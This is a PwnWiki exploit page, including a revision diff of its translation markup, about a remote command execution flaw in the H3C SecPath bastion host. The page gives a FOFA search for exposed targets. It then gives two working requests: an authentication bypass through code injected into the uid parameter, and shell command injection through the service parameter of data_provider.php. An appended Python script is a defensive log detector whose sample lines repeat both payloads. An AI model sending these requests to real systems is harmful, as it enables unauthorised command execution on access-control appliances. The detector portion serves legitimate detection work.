Difference between revisions of "H3C SecPath bastion host data provider.php remote command execution vulnerability"
From PwnWiki
(Created page with "<languages /> {| style="margin: auto; width: 750px;color:green;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing=...") |
(Marked this version for translation) |
||
| Line 12: | Line 12: | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
H3C SecParh fortress machine | H3C SecParh fortress machine | ||
| Line 22: | Line 22: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
通過任意用戶登錄獲取Cookie: | 通過任意用戶登錄獲取Cookie: | ||
</translate> | </translate> | ||
| Line 36: | Line 37: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:4--> |
</translate> | </translate> | ||
https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw | https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw | ||
Latest revision as of 10:05, 21 June 2021
Affected products
H3C SecPath bastion host
FOFA
app="H3C-SecPath-运维审计系统"
Exploitation
Obtain a cookie via arbitrary user login:
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true
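For detection, the two requests above can be hunted in web access logs. The following is an added example, not part of the original page or of any H3C tooling; it assumes combined-format access logs, and the regular expressions are heuristics chosen for this sketch:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Heuristics (assumptions of this example, not vendor signatures).
SHELL_META = re.compile(r"\$\(|`|[;|&<>\r\n]")  # command substitution, chaining
UID_CODE = re.compile(r"chr\s*\(|\bprint\b|[\r\n#()]", re.I)  # code fragments in uid
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return a finding label for one request target, or None if nothing matches."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are percent-decoded
    if parts.path.endswith("/audit/gui_detail_view.php"):
        if any(UID_CODE.search(v) for v in params.get("uid", [])):
            return "gui_detail_view.php: code in uid parameter"
    if parts.path.endswith("/audit/data_provider.php"):
        if any(SHELL_META.search(v) for v in params.get("service", [])):
            return "data_provider.php: shell metacharacters in service parameter"
    return None

def scan(lines):
    """Return (line_number, label) for every access-log line that matches."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        label = classify(match.group(1)) if match else None
        if label:
            findings.append((number, label))
    return findings

# Constructed access-log lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jun/2021:10:01:00 +0000] "GET /audit/data_provider.php?ds_y=2019&ds_m=04&service=ssh&format=json HTTP/1.1" 200 811',
    '198.51.100.7 - - [21/Jun/2021:10:02:00 +0000] "GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1" 200 95',
    '198.51.100.7 - - [21/Jun/2021:10:02:05 +0000] "GET /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1" 200 140',
]

if __name__ == "__main__":
    for number, label in scan(SAMPLE_LOG):
        print(f"line {number}: {label}")
```

Because `parse_qs` percent-decodes values before matching, an encoded form of the same `service` value is flagged as well.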